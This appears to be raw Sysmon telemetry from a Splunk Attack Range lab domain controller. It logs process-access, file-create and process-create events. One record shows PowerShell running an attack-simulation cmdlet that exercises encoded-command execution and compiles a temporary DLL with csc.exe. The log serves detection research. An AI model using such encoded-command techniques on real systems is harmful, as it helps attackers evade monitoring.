22:55:48.724{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F4-603D-8388-00000000AD01}4332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.724{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.724{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.724{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.724{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.724{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F4-603D-8388-00000000AD01}4332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.724{05ADC7E1-70F4-603D-8288-00000000AD01}51328852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{05ADC7E1-70F4-603D-8388-00000000AD01}4332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001697947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.726{05ADC7E1-70F4-603D-8388-00000000AD01}4332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RESB0B.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\CSCF60D2C72CB24E5CA37C5EAFB23BE71.TMP"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{05ADC7E1-70F4-603D-8288-00000000AD01}5132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.cmdline" 10341000x80000000000000001697946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F4-603D-8288-00000000AD01}5132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-70F4-603D-8288-00000000AD01}5132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-70F4-603D-8188-00000000AD01}31242984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F4-603D-8288-00000000AD01}5132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+d41c3b48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+d41c3b48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d8357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64) 154100x80000000000000001697939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.657{05ADC7E1-70F4-603D-8288-00000000AD01}5132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.cmdline"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop} 11241100x80000000000000001697938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.cmdline2021-03-01 22:55:48.646 11241100x80000000000000001697937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:48.646{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.dll2021-03-01 22:55:48.646 23542300x80000000000000001697936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.646{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=12D04BBFBACB30A09C46F9F17251FB0A,SHA256=3370C67F188FC59D011CDA22F35EC9D5BC7EDAB0BC4627A84C6DE20F75509C76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.475{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.474{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.460{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9027CACBAF298AEC6B870F6950FF793,SHA256=68B9C24022B0C7E428C52EE316EA0F3ED5C3A7995F4F2794CC22A76893AEA769,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.427{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.427{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:48.396{05ADC7E1-70F4-603D-8188-00000000AD01}3124\PSHost.132591129483092164.3124.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.374{05ADC7E1-70F4-603D-8188-00000000AD01}3124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_2em1ewgv.iot.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.374{05ADC7E1-70F4-603D-8188-00000000AD01}3124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4yigeuvu.vfs.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.372{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4yigeuvu.vfs.ps12021-03-01 22:55:48.372 10341000x80000000000000001697926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.349{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8188-00000000AD01}3124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 